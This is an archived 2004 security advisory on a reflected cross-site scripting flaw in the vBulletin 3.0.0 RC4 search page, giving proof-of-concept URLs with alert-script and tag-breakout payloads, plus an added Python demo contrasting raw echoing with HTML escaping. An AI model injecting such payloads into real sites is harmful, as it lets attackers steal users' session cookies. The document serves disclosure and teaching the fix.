TUCoPS :: Web BBS :: Frequently Exploited :: hack1000.htm

vBulletin PHP Forum Version




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software:     vBulletin PHP Forum Version
Vendor:       Jelsoft Enterprises Ltd
              http://www.vbulletin.com
Versions:     3.0.0 Release Candidate 4
Platforms:    Unix/Windows
Bug:          Cross Site Scripting Vulnerability
Risk:         Low
Exploitation: Remote with browser
Date:         24 Jan 2004
Author:       Rafel Ivgi, The-Insider
e-mail:       the_insider@mail.com
web:          http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Cross Site Scripting attacks are the most reliable form of malicious URL
against forums, because forum requests are always long and carry many
parameters. vBulletin is a very trusted forum; it is considered to be a very
safe and security-validated forum.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The vulnerability is Cross Site Scripting. If an attacker searches for the
following query on the server:


OR in case you have problems:

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

OR just refer to

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>

XSS appears and the server allows an attacker to inject & execute scripts.

In the words of securityfocus.com:

~~~~~~~~~~~~~~~~~~~~~~~~~~
If all of these circumstances are met, an attacker may be able to exploit
this issue via a malicious link containing arbitrary HTML and script code
as part of the hostname. When the malicious link is clicked by an
unsuspecting user, the attacker-supplied HTML and script code will be
executed by their web client. This will occur because the server will echo
back the malicious hostname supplied in the client's request, without
sufficiently escaping HTML and script code. Attacks of this nature may make
it possible for attackers to manipulate web content or to steal
cookie-based authentication credentials. It may be possible to take
arbitrary actions as the victim user.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

http://<host>/forum/search.php?do=process&showposts=0&query=<!-- / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>

http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('XSS')</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."
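To show the flaw and its fix side by side, here is an added Python stand-in for the search results template that echoes the "query" parameter (example code, not vBulletin's own PHP): the template is constructed for illustration, and the two query values are the ones from section 3 of the advisory.

```python
import html
import re

# Constructed template, loosely modelled on a "no results" error message
# that echoes the submitted search query back into the page. It is an
# illustration only, not vBulletin's real template.
TEMPLATE = (
    "<html><body>\n"
    "<blockquote><p>\n"
    "<!-- main error message -->\n"
    "Sorry, no matches for: {query}\n"
    "</p></blockquote>\n"
    "</body></html>\n"
)


def render_vulnerable(query: str) -> str:
    """Interpolate the raw query string into the page (the advisory's flaw)."""
    return TEMPLATE.format(query=query)


def render_hardened(query: str) -> str:
    """HTML-escape &, <, >, " and ' before interpolation (the fix)."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_script_tag(page: str) -> bool:
    """True if the rendered page still contains a live <script> element."""
    return SCRIPT_TAG.search(page) is not None


# The two query values from section 3 of the advisory. The second one first
# closes the enclosing <p>/<blockquote> and ends with <plaintext> so the
# browser stops parsing the rest of the page after the injected script.
SIMPLE_PAYLOAD = "<script>alert('XSS')</script>"
BREAKOUT_PAYLOAD = (
    "<!-- / main error message --></p></p></blockquote>"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>"
)

if __name__ == "__main__":
    for payload in (SIMPLE_PAYLOAD, BREAKOUT_PAYLOAD):
        print("vulnerable page has <script>:", contains_script_tag(render_vulnerable(payload)))
        print("hardened page has <script>:  ", contains_script_tag(render_hardened(payload)))
```

Escaping at the output point neutralises both payloads regardless of where in the template the query lands, which is why it, rather than filtering specific tags, is the fix.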